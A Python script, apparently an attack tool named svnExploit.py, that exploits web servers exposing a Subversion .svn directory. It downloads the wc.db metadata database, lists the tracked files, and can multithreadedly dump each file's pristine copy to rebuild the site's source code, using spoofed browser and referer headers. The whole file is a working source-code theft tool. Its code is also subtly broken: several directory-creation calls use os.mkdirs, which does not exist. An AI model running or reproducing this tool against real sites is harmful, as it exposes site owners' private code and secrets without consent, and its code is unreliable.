#coding=utf-8
author = "AdminTony"


import requests,threading
import sqlite3,os,re,sys,optparse

"""
 * 全局变量定义区
"""
header={'accept':'text/html,application/xhtml+xml,application/xml',
        'user-agent':'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Mobile Safari/537.36',
        'referer':'http://baidu.com'}


# 下载wc.db
def download_db(url):
    db_url = url+"wc.db"
    # 判断存放数据库的目录是否存在
    if(not os.path.exists('dbs')):
        os.mkdirs('dbs')
    #匹配url中的host，然后作为文件夹名
    pattern = re.compile(r'(?:\w+\.+)+(?:\w+)')
    host = pattern.findall(url)
    # 判断host 这个目录是否存在，如果存在的话就创建 host(i) i 递增
    if(not os.path.exists("dbs/"+host[0])):
        os.mkdirs("dbs/"+host[0])
        path = "dbs/"+host[0]
    else:
        i = 1
        while (os.path.exists("dbs/"+host[0]+"("+str(i)+")")):
            i = i+1
        os.mkdirs("dbs/"+host[0]+"("+str(i)+")")
        path = "dbs/"+host[0]+"("+str(i)+")"

    # 组成最终地址
    db_path = path+"/wc.db"
    # 下载数据库
    res = requests.get(db_url,headers=header)
    if res.status_code!=200:
        print("[-] 未找到%s/wc.db"%url)
        sys.exit()
    with open(db_path,"wb") as file:
        file.write(res.content)
    return db_path

# 连接数据库，查询数据库 然后把 local_relpath \ kind \ checksum 取出来
def db_conn(db_path):
    try:
        conn = sqlite3.connect(db_path)
        cursor = conn.cursor()
        cursor.execute("select local_relpath,kind,checksum from NODES")
        values = cursor.fetchall()
        return values
    except:
        print("[-] wc.db连接失败!")

def print_values(values):
    print("[+] 文件名 | 文件类型 | checksum")
    for v in values:
        if v[0] :
            print("[+] %s   %s   %s" %(v[0],v[1],v[2]))

# 生成器 存放values中的记录，供下载源码使用
def Gen_values(values):
    for v in values:
        if v[0]:
            yield v


def down_file(url,db_path,Gen_value):
    # 获取下载后保存的本地地址
    path = os.path.dirname(db_path) # dbs/127.0.0.1

    # 取出生成器中的记录
    while True:
        try:
            value = Gen_value.__next__()
        except:
            break
        #print(value)
        #sys.exit()
        if value[1]=="dir":
            if not os.path.exists(path +"/"+ value[0]):
                try:
                    os.mkdirs(path +"/"+ value[0])
                except:
                    pass
        else:
            # 如果checksum == None 说明文件已经被删除
            if value[2] == None:
                continue
            # 处理checksum
            checksum = value[2][6:]
            url_file = url+"pristine/"+checksum[:2]+"/"+checksum+".svn-base"
            #print(url_file)
            # 下载代码
            try:
                res = requests.get(url_file,headers=header)
            except:
                print("[-] 下载%s失败!" %url_file)
                continue
            if not os.path.exists(os.path.dirname(path+"/"+value[0])):
                try:
                    os.mkdirs(os.path.dirname(path+"/"+value[0]))
                except:
                    pass
            with open(path+"/"+value[0],"wb") as file :
                file.write(res.content)
                print("[-] 下载%s成功!" %url_file)

if __name__ == '__main__':
    """
    命令行参数：
        svnExploit.py -u TargetURL [--dump --thread 5]
    """
    opt = optparse.OptionParser()
    opt.add_option("-u","--url",action="store",dest="url",help="TargetURL e.g.http://url/.svn")
    opt.add_option("--thread",action="store",dest="thread_num",type="int",default=5,
                   help="The thread num default is 5")
    opt.add_option("--dump",action="store_true",dest="dump",
                   help = "Dump file")
    (options, args) = opt.parse_args()
    if len(sys.argv) <2 :
        print("""svnExploit.py -u TargetURL [--dump --thread 5]
 -h 查看详细帮助
        """)
        sys.exit()
    if not options.url:
        print("[+] URL Error!")
    url = options.url
    # 在拿到url后判断后面是否有/ 如果没有就加上
    re_ = re.compile(r'[\w\.\/\:]+/$')
    if not re_.search(url):
        url = url+"/"
    db_path = download_db(url)
    values = db_conn(db_path)
    # 判断是否要dump
    if not options.dump:
        print_values(values)
    else:
        Gen_value = Gen_values(values)
        threads = []
        for i in range(options.thread_num):
            thread = threading.Thread(target=down_file,args=(url,db_path,Gen_value))
            thread.start()
            threads.append(thread)
        for thread in threads:
            thread.join()
        print("[+] 已经Dump完成!")
